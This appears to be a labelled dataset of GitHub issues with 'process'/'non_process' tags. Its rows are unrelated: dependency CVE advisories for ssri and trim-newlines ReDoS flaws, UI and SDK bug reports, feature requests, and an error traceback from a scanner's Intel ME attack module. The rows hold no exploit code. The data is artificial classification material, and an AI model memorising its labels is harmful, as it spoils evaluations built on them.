get raw data target hw sys agent agent proxy proxy file home scanner zeus scanner lib attacks intel me init py line in get raw data authorization get auth headers target file home scanner zeus 
scanner lib attacks intel me init py line in get auth headers proxies proxy file usr local lib dist packages requests api py line in get return request get url params params kwargs file usr local lib dist packages requests api py line in request return session request method method url url kwargs file usr local lib dist packages requests sessions py line in request resp self send prep send kwargs file usr local lib dist packages requests sessions py line in send r adapter send request kwargs file usr local lib dist packages requests adapters py line in send raise connectionerror e request request connectionerror httpconnectionpool host http port max retries exceeded with url tajs qq com index htm caused by newconnectionerror failed to establish a new connection no address associated with hostname zeus log info zeus got an unexpected error and will automatically create an issue for this error please wait zeus log info getting authorization zeus log info extracting traceback from log file zeus log info attempting to get firefox browser version zeus log info issue has been created successfully with the following name connectionerror httpconnectionpool host http port max retries exceeded with url tajs qq com index htm caused by newconnectionerror failed to establish a new connection no address associated with hostname zeus log info attempting to connect to and get hardware info zeus log info getting raw information zeus log info header value not established attempting to get bypass zeus log error ran into exception httpconnectionpool host http port max retries exceeded with url tajs qq com index htm caused by newconnectionerror failed to establish a new connection no address associated with hostname cannot continue traceback most recent call last file home scanner zeus scanner lib attacks intel me init py line in main intel amt json data get hardware url agent agent proxy proxy file home scanner zeus scanner lib attacks intel me init py line in get hardware req get raw 
data target hw sys agent agent proxy proxy file home scanner zeus scanner lib attacks intel me init py line in get raw data authorization get auth headers target file home scanner zeus scanner lib attacks intel me init py line in get auth headers proxies proxy file usr local lib dist packages requests api py line in get return request get url params params kwargs file usr local lib dist packages requests api py line in request return session request method method url url kwargs file usr local lib dist packages requests sessions py line in request resp self send prep send kwargs file usr local lib dist packages requests sessions py line in send r adapter send request kwargs file usr local lib dist packages requests adapters py line in send raise connectionerror e request request connectionerror httpconnectionpool host http port max retries exceeded with url tajs qq com index htm caused by newconnectionerror failed to establish a new connection no address associated with hostname zeus log info got an unexpected error and will automatically create an issue for this error please wait zeus log info authorization zeus log info traceback from log file zeus log info to get firefox browser version | 0 |
162,049 | 20,164,363,796 | IssuesEvent | 2022-02-10 01:45:43 | kapseliboi/dapp | https://api.github.com/repos/kapseliboi/dapp | opened | CVE-2021-27290 (High) detected in ssri-7.1.0.tgz, ssri-6.0.1.tgz | security vulnerability | ## CVE-2021-27290 - High Severity Vulnerability
<details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/vulnerability_details.png' width=19 height=20> Vulnerable Libraries - <b>ssri-7.1.0.tgz</b>, <b>ssri-6.0.1.tgz</b></p></summary>
<p>
<details><summary><b>ssri-7.1.0.tgz</b></p></summary>
<p>Standard Subresource Integrity library -- parses, serializes, generates, and verifies integrity metadata according to the SRI spec.</p>
<p>Library home page: <a href="https://registry.npmjs.org/ssri/-/ssri-7.1.0.tgz">https://registry.npmjs.org/ssri/-/ssri-7.1.0.tgz</a></p>
<p>Path to dependency file: /package.json</p>
<p>Path to vulnerable library: /node_modules/ssri/package.json</p>
<p>
Dependency Hierarchy:
- react-scripts-3.4.2.tgz (Root Library)
- terser-webpack-plugin-2.3.5.tgz
- cacache-13.0.1.tgz
- :x: **ssri-7.1.0.tgz** (Vulnerable Library)
</details>
<details><summary><b>ssri-6.0.1.tgz</b></p></summary>
<p>Standard Subresource Integrity library -- parses, serializes, generates, and verifies integrity metadata according to the SRI spec.</p>
<p>Library home page: <a href="https://registry.npmjs.org/ssri/-/ssri-6.0.1.tgz">https://registry.npmjs.org/ssri/-/ssri-6.0.1.tgz</a></p>
<p>Path to dependency file: /package.json</p>
<p>Path to vulnerable library: /node_modules/webpack/node_modules/ssri/package.json</p>
<p>
Dependency Hierarchy:
- react-scripts-3.4.2.tgz (Root Library)
- webpack-4.42.0.tgz
- terser-webpack-plugin-1.4.4.tgz
- cacache-12.0.4.tgz
- :x: **ssri-6.0.1.tgz** (Vulnerable Library)
</details>
<p>Found in base branch: <b>master</b></p>
</p>
</details>
<p></p>
<details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/high_vul.png' width=19 height=20> Vulnerability Details</summary>
<p>
ssri 5.2.2-8.0.0, fixed in 8.0.1, processes SRIs using a regular expression which is vulnerable to a denial of service. Malicious SRIs could take an extremely long time to process, leading to denial of service. This issue only affects consumers using the strict option.
<p>Publish Date: 2021-03-12
<p>URL: <a href=https://vuln.whitesourcesoftware.com/vulnerability/CVE-2021-27290>CVE-2021-27290</a></p>
</p>
</details>
<p></p>
<details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/cvss3.png' width=19 height=20> CVSS 3 Score Details (<b>7.5</b>)</summary>
<p>
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: None
- Scope: Unchanged
- Impact Metrics:
- Confidentiality Impact: None
- Integrity Impact: None
- Availability Impact: High
</p>
For more information on CVSS3 Scores, click <a href="https://www.first.org/cvss/calculator/3.0">here</a>.
</p>
</details>
<p></p>
<details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/suggested_fix.png' width=19 height=20> Suggested Fix</summary>
<p>
<p>Type: Upgrade version</p>
<p>Origin: <a href="https://github.com/advisories/GHSA-vx3p-948g-6vhq">https://github.com/advisories/GHSA-vx3p-948g-6vhq</a></p>
<p>Release Date: 2021-03-12</p>
<p>Fix Resolution: ssri - 6.0.2,7.1.1,8.0.1</p>
</p>
</details>
<p></p>
***
Step up your Open Source Security Game with WhiteSource [here](https://www.whitesourcesoftware.com/full_solution_bolt_github) | True | CVE-2021-27290 (High) detected in ssri-7.1.0.tgz, ssri-6.0.1.tgz - ## CVE-2021-27290 - High Severity Vulnerability
<details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/vulnerability_details.png' width=19 height=20> Vulnerable Libraries - <b>ssri-7.1.0.tgz</b>, <b>ssri-6.0.1.tgz</b></p></summary>
<p>
<details><summary><b>ssri-7.1.0.tgz</b></p></summary>
<p>Standard Subresource Integrity library -- parses, serializes, generates, and verifies integrity metadata according to the SRI spec.</p>
<p>Library home page: <a href="https://registry.npmjs.org/ssri/-/ssri-7.1.0.tgz">https://registry.npmjs.org/ssri/-/ssri-7.1.0.tgz</a></p>
<p>Path to dependency file: /package.json</p>
<p>Path to vulnerable library: /node_modules/ssri/package.json</p>
<p>
Dependency Hierarchy:
- react-scripts-3.4.2.tgz (Root Library)
- terser-webpack-plugin-2.3.5.tgz
- cacache-13.0.1.tgz
- :x: **ssri-7.1.0.tgz** (Vulnerable Library)
</details>
<details><summary><b>ssri-6.0.1.tgz</b></p></summary>
<p>Standard Subresource Integrity library -- parses, serializes, generates, and verifies integrity metadata according to the SRI spec.</p>
<p>Library home page: <a href="https://registry.npmjs.org/ssri/-/ssri-6.0.1.tgz">https://registry.npmjs.org/ssri/-/ssri-6.0.1.tgz</a></p>
<p>Path to dependency file: /package.json</p>
<p>Path to vulnerable library: /node_modules/webpack/node_modules/ssri/package.json</p>
<p>
Dependency Hierarchy:
- react-scripts-3.4.2.tgz (Root Library)
- webpack-4.42.0.tgz
- terser-webpack-plugin-1.4.4.tgz
- cacache-12.0.4.tgz
- :x: **ssri-6.0.1.tgz** (Vulnerable Library)
</details>
<p>Found in base branch: <b>master</b></p>
</p>
</details>
<p></p>
<details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/high_vul.png' width=19 height=20> Vulnerability Details</summary>
<p>
ssri 5.2.2-8.0.0, fixed in 8.0.1, processes SRIs using a regular expression which is vulnerable to a denial of service. Malicious SRIs could take an extremely long time to process, leading to denial of service. This issue only affects consumers using the strict option.
<p>Publish Date: 2021-03-12
<p>URL: <a href=https://vuln.whitesourcesoftware.com/vulnerability/CVE-2021-27290>CVE-2021-27290</a></p>
</p>
</details>
<p></p>
<details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/cvss3.png' width=19 height=20> CVSS 3 Score Details (<b>7.5</b>)</summary>
<p>
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: None
- Scope: Unchanged
- Impact Metrics:
- Confidentiality Impact: None
- Integrity Impact: None
- Availability Impact: High
</p>
For more information on CVSS3 Scores, click <a href="https://www.first.org/cvss/calculator/3.0">here</a>.
</p>
</details>
<p></p>
<details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/suggested_fix.png' width=19 height=20> Suggested Fix</summary>
<p>
<p>Type: Upgrade version</p>
<p>Origin: <a href="https://github.com/advisories/GHSA-vx3p-948g-6vhq">https://github.com/advisories/GHSA-vx3p-948g-6vhq</a></p>
<p>Release Date: 2021-03-12</p>
<p>Fix Resolution: ssri - 6.0.2,7.1.1,8.0.1</p>
</p>
</details>
<p></p>
***
Step up your Open Source Security Game with WhiteSource [here](https://www.whitesourcesoftware.com/full_solution_bolt_github) | non_process | cve high detected in ssri tgz ssri tgz cve high severity vulnerability vulnerable libraries ssri tgz ssri tgz ssri tgz standard subresource integrity library parses serializes generates and verifies integrity metadata according to the sri spec library home page a href path to dependency file package json path to vulnerable library node modules ssri package json dependency hierarchy react scripts tgz root library terser webpack plugin tgz cacache tgz x ssri tgz vulnerable library ssri tgz standard subresource integrity library parses serializes generates and verifies integrity metadata according to the sri spec library home page a href path to dependency file package json path to vulnerable library node modules webpack node modules ssri package json dependency hierarchy react scripts tgz root library webpack tgz terser webpack plugin tgz cacache tgz x ssri tgz vulnerable library found in base branch master vulnerability details ssri fixed in processes sris using a regular expression which is vulnerable to a denial of service malicious sris could take an extremely long time to process leading to denial of service this issue only affects consumers using the strict option publish date url a href cvss score details base score metrics exploitability metrics attack vector network attack complexity low privileges required none user interaction none scope unchanged impact metrics confidentiality impact none integrity impact none availability impact high for more information on scores click a href suggested fix type upgrade version origin a href release date fix resolution ssri step up your open source security game with whitesource | 0 |
811,222 | 30,279,693,777 | IssuesEvent | 2023-07-08 00:46:08 | naturalcrit/homebrewery | https://api.github.com/repos/naturalcrit/homebrewery | closed | Recent Items menu dropdown is inconsistent with other menu dropdowns | cleanup tweak P3 - low priority | ### Renderer
v3
### Browser
Chrome
### Operating System
Windows
### What happened?
The Recent Items (Edited/Viewed) dropdown menu is inconsistent with the other dropdown menus.
- appears instantly/not animated
- different HTML structure and classes
The content of the Recent Items dropdown may just need to be shifted to the existing Nav dropdown container framework.
### Code
_No response_ | 1.0 | Recent Items menu dropdown is inconsistent with other menu dropdowns - ### Renderer
v3
### Browser
Chrome
### Operating System
Windows
### What happened?
The Recent Items (Edited/Viewed) dropdown menu is inconsistent with the other dropdown menus.
- appears instantly/not animated
- different HTML structure and classes
The content of the Recent Items dropdown may just need to be shifted to the existing Nav dropdown container framework.
### Code
_No response_ | non_process | recent items menu dropdown is inconsistent with other menu dropdowns renderer browser chrome operating system windows what happened the recent items edited viewed dropdown menu is inconsistent with the other dropdown menus appears instantly not animated different html structure and classes the content of the recent items dropdown may just need to be shifted to the existing nav dropdown container framework code no response | 0 |
102,663 | 16,577,354,351 | IssuesEvent | 2021-05-31 07:12:12 | scriptex/url-shortener | https://api.github.com/repos/scriptex/url-shortener | closed | CVE-2021-33623 (Medium) detected in trim-newlines-3.0.0.tgz | security vulnerability | ## CVE-2021-33623 - Medium Severity Vulnerability
<details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/vulnerability_details.png' width=19 height=20> Vulnerable Library - <b>trim-newlines-3.0.0.tgz</b></p></summary>
<p>Trim newlines from the start and/or end of a string</p>
<p>Library home page: <a href="https://registry.npmjs.org/trim-newlines/-/trim-newlines-3.0.0.tgz">https://registry.npmjs.org/trim-newlines/-/trim-newlines-3.0.0.tgz</a></p>
<p>Path to dependency file: url-shortener/package.json</p>
<p>Path to vulnerable library: url-shortener/node_modules/trim-newlines</p>
<p>
Dependency Hierarchy:
- del-cli-3.0.1.tgz (Root Library)
- meow-6.1.1.tgz
- :x: **trim-newlines-3.0.0.tgz** (Vulnerable Library)
<p>Found in HEAD commit: <a href="https://github.com/scriptex/url-shortener/commit/179b1e0ec1849aceb57e4e0560791c2b4a0c0ecd">179b1e0ec1849aceb57e4e0560791c2b4a0c0ecd</a></p>
<p>Found in base branch: <b>master</b></p>
</p>
</details>
<p></p>
<details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/medium_vul.png' width=19 height=20> Vulnerability Details</summary>
<p>
The trim-newlines package before 3.0.1 and 4.x before 4.0.1 for Node.js has an issue related to regular expression denial-of-service (ReDoS) for the .end() method.
<p>Publish Date: 2021-05-28
<p>URL: <a href=https://vuln.whitesourcesoftware.com/vulnerability/CVE-2021-33623>CVE-2021-33623</a></p>
</p>
</details>
<p></p>
<details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/cvss3.png' width=19 height=20> CVSS 3 Score Details (<b>5.3</b>)</summary>
<p>
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: None
- Scope: Unchanged
- Impact Metrics:
- Confidentiality Impact: None
- Integrity Impact: Low
- Availability Impact: None
</p>
For more information on CVSS3 Scores, click <a href="https://www.first.org/cvss/calculator/3.0">here</a>.
</p>
</details>
<p></p>
<details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/suggested_fix.png' width=19 height=20> Suggested Fix</summary>
<p>
<p>Type: Upgrade version</p>
<p>Origin: <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33623">https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33623</a></p>
<p>Release Date: 2021-05-28</p>
<p>Fix Resolution: trim-newlines - 3.0.1, 4.0.1</p>
</p>
</details>
<p></p>
***
Step up your Open Source Security Game with WhiteSource [here](https://www.whitesourcesoftware.com/full_solution_bolt_github) | True | CVE-2021-33623 (Medium) detected in trim-newlines-3.0.0.tgz - ## CVE-2021-33623 - Medium Severity Vulnerability
<details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/vulnerability_details.png' width=19 height=20> Vulnerable Library - <b>trim-newlines-3.0.0.tgz</b></p></summary>
<p>Trim newlines from the start and/or end of a string</p>
<p>Library home page: <a href="https://registry.npmjs.org/trim-newlines/-/trim-newlines-3.0.0.tgz">https://registry.npmjs.org/trim-newlines/-/trim-newlines-3.0.0.tgz</a></p>
<p>Path to dependency file: url-shortener/package.json</p>
<p>Path to vulnerable library: url-shortener/node_modules/trim-newlines</p>
<p>
Dependency Hierarchy:
- del-cli-3.0.1.tgz (Root Library)
- meow-6.1.1.tgz
- :x: **trim-newlines-3.0.0.tgz** (Vulnerable Library)
<p>Found in HEAD commit: <a href="https://github.com/scriptex/url-shortener/commit/179b1e0ec1849aceb57e4e0560791c2b4a0c0ecd">179b1e0ec1849aceb57e4e0560791c2b4a0c0ecd</a></p>
<p>Found in base branch: <b>master</b></p>
</p>
</details>
<p></p>
<details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/medium_vul.png' width=19 height=20> Vulnerability Details</summary>
<p>
The trim-newlines package before 3.0.1 and 4.x before 4.0.1 for Node.js has an issue related to regular expression denial-of-service (ReDoS) for the .end() method.
<p>Publish Date: 2021-05-28
<p>URL: <a href=https://vuln.whitesourcesoftware.com/vulnerability/CVE-2021-33623>CVE-2021-33623</a></p>
</p>
</details>
<p></p>
<details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/cvss3.png' width=19 height=20> CVSS 3 Score Details (<b>5.3</b>)</summary>
<p>
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: None
- Scope: Unchanged
- Impact Metrics:
- Confidentiality Impact: None
- Integrity Impact: Low
- Availability Impact: None
</p>
For more information on CVSS3 Scores, click <a href="https://www.first.org/cvss/calculator/3.0">here</a>.
</p>
</details>
<p></p>
<details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/suggested_fix.png' width=19 height=20> Suggested Fix</summary>
<p>
<p>Type: Upgrade version</p>
<p>Origin: <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33623">https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33623</a></p>
<p>Release Date: 2021-05-28</p>
<p>Fix Resolution: trim-newlines - 3.0.1, 4.0.1</p>
</p>
</details>
<p></p>
***
Step up your Open Source Security Game with WhiteSource [here](https://www.whitesourcesoftware.com/full_solution_bolt_github) | non_process | cve medium detected in trim newlines tgz cve medium severity vulnerability vulnerable library trim newlines tgz trim newlines from the start and or end of a string library home page a href path to dependency file url shortener package json path to vulnerable library url shortener node modules trim newlines dependency hierarchy del cli tgz root library meow tgz x trim newlines tgz vulnerable library found in head commit a href found in base branch master vulnerability details the trim newlines package before and x before for node js has an issue related to regular expression denial of service redos for the end method publish date url a href cvss score details base score metrics exploitability metrics attack vector network attack complexity low privileges required none user interaction none scope unchanged impact metrics confidentiality impact none integrity impact low availability impact none for more information on scores click a href suggested fix type upgrade version origin a href release date fix resolution trim newlines step up your open source security game with whitesource | 0 |
24,645 | 12,138,164,963 | IssuesEvent | 2020-04-23 16:48:11 | Azure/azure-sdk-for-net | https://api.github.com/repos/Azure/azure-sdk-for-net | closed | [Sql] DatabasesOperationsExtensions.DeleteAsync() should throw if not exists | Mgmt SQL Service Attention | DatabasesOperationsExtensions.DeleteAsync() should throw an exception when the database does not exist. Currently you can await it and if the database doesn't exist it will simply carry on. This is in contrast to say attempting to delete a Dns record set which will throw if it does not exist. | 1.0 | [Sql] DatabasesOperationsExtensions.DeleteAsync() should throw if not exists - DatabasesOperationsExtensions.DeleteAsync() should throw an exception when the database does not exist. Currently you can await it and if the database doesn't exist it will simply carry on. This is in contrast to say attempting to delete a Dns record set which will throw if it does not exist. | non_process | databasesoperationsextensions deleteasync should throw if not exists databasesoperationsextensions deleteasync should throw an exception when the database does not exist currently you can await it and if the database doesn t exist it will simply carry on this is in contrast to say attempting to delete a dns record set which will throw if it does not exist | 0 |
11,724 | 14,563,428,410 | IssuesEvent | 2020-12-17 02:29:42 | allinurl/goaccess | https://api.github.com/repos/allinurl/goaccess | closed | Can goaccess support the second ip address? | enhancement log-processing log/date/time format | Hello, my server is behind a proxy server.
My nginx log looks like this:
a.a.a.a (remote_addr)-[12 /Aug/ 2020: 20: 50: 02 +0000] "GET /" 302 5 "-"" Mozilla / 5.0" "b.b.b.b" (XFF)
I use "~h" to get the user's ip from the X-Forwarded-For (XFF) field, but sometimes some crawlers may scan my server directly through the ip address. In this case, XFF is "-", which may cause goaccess to throw a "Token for '%h' specifier is NULL" error.
I tried the "--no-ip-validation" option, but when the XFF of the first line of the log file is "-", the option does not work.
I prefer to set remote_addr (a.a.a.a) as the second host. When the first host is "-", goaccess can use the second host.
Can you support a second IP address?
Best wishes | 1.0 | Can goaccess support the second ip address? - Hello, my server is behind a proxy server.
My nginx log looks like this:
a.a.a.a (remote_addr)-[12 /Aug/ 2020: 20: 50: 02 +0000] "GET /" 302 5 "-"" Mozilla / 5.0" "b.b.b.b" (XFF)
I use "~h" to get the user's ip from the X-Forwarded-For (XFF) field, but sometimes some crawlers may scan my server directly through the ip address. In this case, XFF is "-", which may cause goaccess to throw a "Token for '%h' specifier is NULL" error.
I tried the "--no-ip-validation" option, but when the XFF of the first line of the log file is "-", the option does not work.
I prefer to set remote_addr (a.a.a.a) as the second host. When the first host is "-", goaccess can use the second host.
Can you support a second IP address?
Best wishes | process | can goaccess support the second ip address hello my server is behind a proxy server my nginx log looks like this a a a a remote addr get mozilla b b b b xff i use h to get the user s ip from the x forwarded for xff field but sometimes some crawlers may scan my server directly through the ip address in this case xff is which may cause goaccess to throw a token for h specifier is null error i tried the no ip validation option but when the xff of the first line of the log file is the option does not work i prefer to set remote addr a a a a as the second host when the first host is goaccess can use the second host can you support a second ip address best wishes | 1 |
63,983 | 26,567,068,387 | IssuesEvent | 2023-01-20 21:25:53 | microsoft/vscode-cpptools | https://api.github.com/repos/microsoft/vscode-cpptools | closed | Contribute to the language status | Language Service Feature Request | Hi VS Code PM here 👋
Currently the C++ extension contributes individual items to the status bar. On my macOS I see the `Mac` item in the status bar. I also see some progress items like the occasional flame icon (pictures).
I suggest to use the [language status bar](https://code.visualstudio.com/updates/v1_61#_new-javascript-and-typescript-language-status-item), Typescript is already using this (picture attached).
This way all the C++ status bar items will come under a common item making the whole status bar experience cleaner for our users.
For the status bar items which actually show progress, our current advice is to use the `withProgress`-API. With that you announce a long running thing to VS Code. Our current thinking is to add a new progress location which is the extension’s language status. With that we can render something on the composite item as well as on the item itself. This is being discussed [here](https://github.com/microsoft/vscode/issues/129037#issuecomment-957360329), please chime in.
fyi @bobbrow @jureid @jrieken @egamma



| 1.0 | Contribute to the language status - Hi VS Code PM here 👋
Currently the C++ extension contributes individual items to the status bar. On my macOS I see the `Mac` item in the status bar. I also see some progress items like the occasional flame icon (pictures).
I suggest to use the [language status bar](https://code.visualstudio.com/updates/v1_61#_new-javascript-and-typescript-language-status-item), Typescript is already using this (picture attached).
This way all the C++ status bar items will come under a common item making the whole status bar experience cleaner for our users.
For the status bar items which actually show progress, our current advice is to use the `withProgress`-API. With that you announce a long running thing to VS Code. Our current thinking is to add a new progress location which is the extension’s language status. With that we can render something on the composite item as well as on the item itself. This is being discussed [here](https://github.com/microsoft/vscode/issues/129037#issuecomment-957360329), please chime in.
fyi @bobbrow @jureid @jrieken @egamma



| non_process | contribute to the language status hi vs code pm here 👋 currently the c extension contributes individual items to the status bar on my macos i see the mac item in the status bar i also see some progress items like the occasional flame icon pictures i suggest to use the typescript is already using this picture attached this way all the c status bar items will come under a common item making the whole status bar experience cleaner for our users the status bar items which are actually progress our current advise is to use the withprogress api with that you announce a long running thing to vs code our current thinking is to add a new progress location which is the extension’s language status with that we can render something on the composite item as well as on the item itself this is being discussed please chime in fyi bobbrow jureid jrieken egamma | 0 |
14,067 | 16,890,488,014 | IssuesEvent | 2021-06-23 08:39:58 | arcus-azure/arcus.messaging | https://api.github.com/repos/arcus-azure/arcus.messaging | opened | Move `ServiceBusReceiver` to options model for future-proof message routing | area:message-processing enhancement integration:service-bus | **Is your feature request related to a problem? Please describe.**
Move our `ServiceBusReceiver` model from the router signature to an options model so that we are more safe in the future when we want to add stuff from the Azure Functions/message pump to the router.
**Describe alternatives you've considered**
Adding new stuff to the signature, but that requires breaking changes. | 1.0 | Move `ServiceBusReceiver` to options model for future-proof message routing - **Is your feature request related to a problem? Please describe.**
Move our `ServiceBusReceiver` model from the router signature to an options model so that we are more safe in the future when we want to add stuff from the Azure Functions/message pump to the router.
**Describe alternatives you've considered**
Adding new stuff to the signature, but that requires breaking changes. | process | move servicebusreceiver to options model for furture proof message routing is your feature request related to a problem please describe move our servicebusreceiver model from the router signature to an options model so that we are more safe in the future when we want to add stuff from the azure functions message pump to the router describe alternatives you ve considered adding new stuff to the signature but that requires breaking changes | 1 |
4,176 | 7,111,508,980 | IssuesEvent | 2018-01-17 14:26:33 | geneontology/go-ontology | https://api.github.com/repos/geneontology/go-ontology | reopened | question about immune response supression terms | Other term-related request PomBase low priority multiorganism processes | Yep, out of my depth here.
I am annotating a few pathogen-host interaction papers to test some data types they may need to annotate in Canto.
As part of this I'm making some (tentative) GO annotation suggestions.
I was looking for a term to capture the suppression of the host defence response by the pathogen
This looked correct:
GO:0052261 suppression of defense response of other organism involved in symbiotic interaction
Any process in which an organism stops, prevents, or reduces the frequency, rate or extent of the defense response of a second organism, where the two organisms are in a symbiotic interaction.
Then I saw the descendent
GO:0052037 negative regulation by symbiont of host defense response
Any process in which an organism stops, prevents, or reduces the frequency, rate or extent of the defense response of the host organism. The host is defined as the larger of the organisms involved in a symbiotic interaction.
How are these not the same?
Isn't suppression equivalent to negative regulation?
GO:0052037 has additional parents, one of which is
GO:0044414 suppression of host defenses
Any process in which an organism stops, prevents, or reduces the frequency, rate or extent of host defense(s) by active mechanisms that normally result in the shutting down of a host pathway. The host is defined as the larger of the organisms involved in a symbiotic interaction.
Which also sounds the same?
| 1.0 | question about immune response supression terms - Yep, out of my depth here.
I am annotating a few pathogen-host interaction papers to test some data types they may need to annotate in Canto.
As part of this I'm making some (tentative) GO annotation suggestions.
I was looking for a term to capture the suppression of the host defence response by the pathogen
This looked correct:
GO:0052261 suppression of defense response of other organism involved in symbiotic interaction
Any process in which an organism stops, prevents, or reduces the frequency, rate or extent of the defense response of a second organism, where the two organisms are in a symbiotic interaction.
Then I saw the descendent
GO:0052037 negative regulation by symbiont of host defense response
Any process in which an organism stops, prevents, or reduces the frequency, rate or extent of the defense response of the host organism. The host is defined as the larger of the organisms involved in a symbiotic interaction.
How are these not the same?
Isn't suppression equivalent to negative regulation?
GO:0052037 has additional parents, one of which is
GO:0044414 suppression of host defenses
Any process in which an organism stops, prevents, or reduces the frequency, rate or extent of host defense(s) by active mechanisms that normally result in the shutting down of a host pathway. The host is defined as the larger of the organisms involved in a symbiotic interaction.
Which also sounds the same?
| process | question about immune response supression terms yep out of my depth here i am annotating a few pathogen host interaction papers to test some data types they may need to annotate in canto as part of this i m making some tentative go annotation suggestions i was looking for a term to capture the supression of the host defence resonse by the pathogen this looked correct go suppression of defense response of other organism involved in symbiotic interaction any process in which an organism stops prevents or reduces the frequency rate or extent of the defense response of a second organism where the two organisms are in a symbiotic interaction then i saw the descendent go negative regulation by symbiont of host defense response any process in which an organism stops prevents or reduces the frequency rate or extent of the defense response of the host organism the host is defined as the larger of the organisms involved in a symbiotic interaction how are these not the same isn t suppression equivalent to negative regulation go has additional parents one of which is go suppression of host defenses any process in which an organism stops prevents or reduces the frequency rate or extent of host defense s by active mechanisms that normally result in the shutting down of a host pathway the host is defined as the larger of the organisms involved in a symbiotic interaction which also sounds the same | 1 |
509,277 | 14,727,309,271 | IssuesEvent | 2021-01-06 08:19:53 | webcompat/web-bugs | https://api.github.com/repos/webcompat/web-bugs | closed | en.m.wikipedia.org - see bug description | browser-fenix engine-gecko priority-critical | <!-- @browser: Firefox Mobile 86.0 -->
<!-- @ua_header: Mozilla/5.0 (Android 10; Mobile; rv:86.0) Gecko/86.0 Firefox/86.0 -->
<!-- @reported_with: android-components-reporter -->
<!-- @public_url: https://github.com/webcompat/web-bugs/issues/65027 -->
<!-- @extra_labels: browser-fenix -->
**URL**: https://en.m.wikipedia.org/wiki/Main_Page
**Browser / Version**: Firefox Mobile 86.0
**Operating System**: Android
**Tested Another Browser**: Yes Chrome
**Problem type**: Something else
**Description**: crash after searching for an article.
**Steps to Reproduce**:
After typing in a search the browser crashes. I have not changed any settings.
<details>
<summary>View the screenshot</summary>
<img alt="Screenshot" src="https://webcompat.com/uploads/2021/1/0e501262-1de4-4c85-a0fa-10488a33e9ba.jpeg">
</details>
<details>
<summary>Browser Configuration</summary>
<ul>
<li>gfx.webrender.all: false</li><li>gfx.webrender.blob-images: true</li><li>gfx.webrender.enabled: false</li><li>image.mem.shared: true</li><li>buildID: 20210103092941</li><li>channel: nightly</li><li>hasTouchScreen: true</li><li>mixed active content blocked: false</li><li>mixed passive content blocked: false</li><li>tracking content blocked: false</li>
</ul>
</details>
[View console log messages](https://webcompat.com/console_logs/2021/1/ce3c0dcf-a7c6-44ed-b2c5-1250d8c7bb60)
_From [webcompat.com](https://webcompat.com/) with ❤️_ | 1.0 | en.m.wikipedia.org - see bug description - <!-- @browser: Firefox Mobile 86.0 -->
<!-- @ua_header: Mozilla/5.0 (Android 10; Mobile; rv:86.0) Gecko/86.0 Firefox/86.0 -->
<!-- @reported_with: android-components-reporter -->
<!-- @public_url: https://github.com/webcompat/web-bugs/issues/65027 -->
<!-- @extra_labels: browser-fenix -->
**URL**: https://en.m.wikipedia.org/wiki/Main_Page
**Browser / Version**: Firefox Mobile 86.0
**Operating System**: Android
**Tested Another Browser**: Yes Chrome
**Problem type**: Something else
**Description**: crash after searching for an article.
**Steps to Reproduce**:
After typing in a search the browser crashes. I have not changed any settings.
<details>
<summary>View the screenshot</summary>
<img alt="Screenshot" src="https://webcompat.com/uploads/2021/1/0e501262-1de4-4c85-a0fa-10488a33e9ba.jpeg">
</details>
<details>
<summary>Browser Configuration</summary>
<ul>
<li>gfx.webrender.all: false</li><li>gfx.webrender.blob-images: true</li><li>gfx.webrender.enabled: false</li><li>image.mem.shared: true</li><li>buildID: 20210103092941</li><li>channel: nightly</li><li>hasTouchScreen: true</li><li>mixed active content blocked: false</li><li>mixed passive content blocked: false</li><li>tracking content blocked: false</li>
</ul>
</details>
[View console log messages](https://webcompat.com/console_logs/2021/1/ce3c0dcf-a7c6-44ed-b2c5-1250d8c7bb60)
_From [webcompat.com](https://webcompat.com/) with ❤️_ | non_process | en m wikipedia org see bug description url browser version firefox mobile operating system android tested another browser yes chrome problem type something else description crash after searching for an article steps to reproduce after typing in a search the browser crashes i have not changed any settings view the screenshot img alt screenshot src browser configuration gfx webrender all false gfx webrender blob images true gfx webrender enabled false image mem shared true buildid channel nightly hastouchscreen true mixed active content blocked false mixed passive content blocked false tracking content blocked false from with ❤️ | 0 |
10,187 | 4,717,163,259 | IssuesEvent | 2016-10-16 13:31:19 | DMSC-Instrument-Data/plankton | https://api.github.com/repos/DMSC-Instrument-Data/plankton | opened | Introduce "system tests" | build tools enhancement unit tests | We should think of a good way to implement system tests, meaning tests that involve communication with a device in a certain setup using the device protocol. We might do this either by spinning up a docker container with the device running in the configuration that is to be tested.
We could use the python unit test framework and combine it with something like [docker-py](https://docker-py.readthedocs.io/en/latest/) to start containers etc. | 1.0 | non_process | 0 |
381,095 | 26,439,416,383 | IssuesEvent | 2023-01-15 19:51:08 | MarkHuntDev/tatbash-bot | https://api.github.com/repos/MarkHuntDev/tatbash-bot | opened | Write readme and using instructions | documentation | Instructions could be written in GitHub's wiki or Telegram's articles (https://telegram.org/blog/instant-view%C2%BB). | 1.0 | non_process | 0 |
